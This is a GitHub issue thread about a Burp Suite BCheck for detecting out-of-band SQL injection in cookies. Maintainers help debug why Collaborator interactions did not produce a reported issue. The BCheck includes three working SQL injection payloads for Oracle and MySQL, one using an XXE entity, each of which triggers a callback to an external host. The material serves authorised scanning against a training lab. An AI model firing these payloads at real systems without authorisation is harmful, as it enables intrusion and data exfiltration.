PortSwigger / BChecks

BChecks collection for Burp Suite Professional and Burp Suite Enterprise Edition
https://portswigger.net/burp/documentation/scanner/bchecks
GNU Lesser General Public License v3.0

[If any interactions] Didn't create the finding in the Burp dashboard #119

Closed: abdilahrf closed this 9 months ago

abdilahrf commented 9 months ago

Hi, I am creating this BCheck to detect OOB SQL injection within the cookie insertion point. I saw the DNS call within Burp Collaborator, but the issue is not created in the Burp Suite dashboard.

metadata:
    language: v1-beta
    name: "HOSTS OOB SQL Injection"
    description: "Hosts OOB SQL Injection"
    author: "Abdilahrf"

# One payload per backend: an Oracle UTL_INADDR hostname lookup, a MySQL
# LOAD_FILE UNC-path lookup, and an Oracle EXTRACTVALUE/XXE external entity.
# Each run embeds a fresh Collaborator subdomain so interactions can be
# attributed to this check. UTL_INADDR.get_host_addr takes a bare hostname
# (no scheme), and the MySQL subquery must be parenthesised to parse.
run for each:
    payloads =
        `1 AND 1=UTL_INADDR.get_host_addr('{generate_collaborator_address()}')`,
        `1 AND (SELECT LOAD_FILE(concat('\\\\',@@version, '.{generate_collaborator_address()}/')))`,
        `x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://{generate_collaborator_address()}/"> %remote;]>'),'/l') FROM dual--`

# Burp automatically inserts into nested insertion points
given cookie insertion point then

    # only run when the base response was successful
    if {base.response.status_code} is "200" then
        send payload called weaponized:
            appending: {payloads}

        # Any Collaborator interaction (DNS or HTTP) received while this check
        # is still running means the payload reached an out-of-band sink
        if any interactions then
            report issue:
                severity: high
                confidence: certain
                detail: `We found OOB SQL Injection {payloads}`
        end if
    end if

PortSwiggerWiener commented 9 months ago

Hi,

Was the interaction synchronous or asynchronous? Currently BChecks only support the former, i.e. it polls whilst executing the BCheck and any subsequent interactions will not be reported.

abdilahrf commented 9 months ago

I believe it was synchronous. I am testing this using the PortSwigger lab for OOB SQL injection: https://portswigger.net/web-security/learning-paths/sql-injection/sql-injection-exploiting-blind-sql-injection-using-out-of-band-oast-techniques/sql-injection/blind/lab-out-of-band

Michelle-PortSwigger commented 9 months ago

Thanks for the update. We suspect this could be a timing issue, so we'll run some tests here and be in touch later this week to let you know how we're getting on.

Michelle-PortSwigger commented 9 months ago

Having said that, I'm back with a few more checks already :). I've just been doing some tests using your BCheck against the lab 'Blind SQL injection with out-of-band interaction', and it has been reporting an issue for me when I use the 'Run test' functionality from the BCheck editor in our latest Early Adopter version, 2023.10.2. Which specific lab were you using for your testing? If you can let me know, I'll check against the same one.

abdilahrf commented 9 months ago

It's weird, now it's working and creating the issue found. Thanks @Michelle-PortSwigger.